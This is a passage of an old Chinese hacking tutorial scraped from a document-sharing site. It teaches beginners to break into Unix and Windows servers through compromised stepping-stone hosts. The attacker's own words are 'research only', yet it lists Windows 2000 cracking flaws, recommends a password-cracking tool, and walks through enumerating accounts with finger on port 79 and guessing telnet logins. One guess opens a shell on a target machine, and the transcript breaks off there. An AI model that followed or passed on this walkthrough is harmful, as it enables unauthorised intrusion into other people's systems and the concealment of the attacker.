欢迎来到天天文库
浏览记录
ID:15227593
大小:41.00 KB
页数:17页
时间:2018-08-02
《unix入侵教程 (79端口)》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库。
1、unix入侵教程(79端口)unix入侵教程(79端口)2007-03-1317:40unix入侵教程我写这篇文章的目的是给那些想学黑客技术的菜鸟们看的,如果您已经是高手了,您可以跳过去没必要看了J这里所讲叙的是从寻找跳板开始到如何擦PP的完整过程.这篇文章纯属研究性文章.请不要将此用于不正当途径.后果自负!!!最后,如果要转载本文请保持文章的完整性,以尊重作者的版权J一.跳板篇这些年网上黑客事件也日益增多了,各个国家与网络安全的法令也相继推出了!因而如果想入侵一个系统.而又不想惹上官司,那么自身安全因该是放在第一位.嗯,那么如何才可以保证自己不被发现呢?谈论这个问题的文
2、章出来了很多,但在这众多的方法中我还是比较喜欢使用跳板主机(也就是平时说的堡垒主机),使用跳板主机有几点好处,首先是可以隐藏自己,再就是如果有一台功能齐全的跳板主机可以让工作达到事半功倍的效果:)那么如果得到一台跳板主机呢?在网络上运行的服务器有很多,最常见的有UnixLinuxNTW2kSolarisirixFreeBSD不过在这些主机中我最喜欢用W2k和Linux作为攻击平台了。W2k的Crack方法有很多比如:输入法漏洞,Unicode二次编码漏洞,IPC共享密码猜测等等,这些漏洞的利用方法有很多,而如何将NT/W2k做成跳板的文章也不少,因而我在这里也没有必要再重
3、复了,我建议大家可以看看小榕写的关于如何利用IPC的补充文档,上面有如何将NT/W2k做成跳板的详细过程!下面我主要介绍如何制作Linux的跳板主机,要得到一台Linux可以用破译弱口令的方法得到,至于破译弱口令的工具我感觉流光是最好用的:)你可以到www.netxeyes.org免费得到。如果不想下工具的朋友,可以使用Finger命令来得到弱口令列表:比如我们已经知道xxx.xxx.xxx.xxx的79端口开放,那么我们可以轻易的得到一些薄弱主机的用户列表J――――――――――――――――――test――――――――――――――――――c:>finger0@xxx.xx
4、x.xxx.xxx[xxx.xxx.xxx.xxx]finger:0:nosuchuser------------------------------------------------------end------------------------------------------------------失败:(呵呵。。。没关系啦,别灰心我们再来!!!-------------------------------------------------------test--------------------------------------------------
5、---c:>finger0@xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]LoginNameTTYIdleWhenWhereRoot???<….>Bin???<….>Sys???<….>ver21???pst/0211.25.64.2liky???437211.35.26.4how???pst/2211.65.24.8tong???pst/0211.85.24.5test???<….>dv0928???52211.54.25.6nobody???021211.25.42.6imnadm???62211.23.65.5哈哈。。。这么多用户:)这下我发了:)
6、c:>telnetxxx.xxx.xxx.xxxRedHatLinuxrelease6.0Publisher'sEdition(Hedwig)Kernel2.2.5-15onani586Login:nobodyPassword:LoginincorrectLogin:imnadmPassword:LoginincorrectLogin:testPassword:###########################################################################However,astheServwillreloadthos
7、eclasses.##insidethe“/usr/proj/gipex/class”.youjust.##needtoremovetheoldclasswiththenewone.###########################################################################$w6:19pmup61day(s),3:40,3users,loadaverage:0.11,0.07,0.10Userttylogin@idleJCPUPCPUwhatrootconsole4Ma
此文档下载收益归作者所有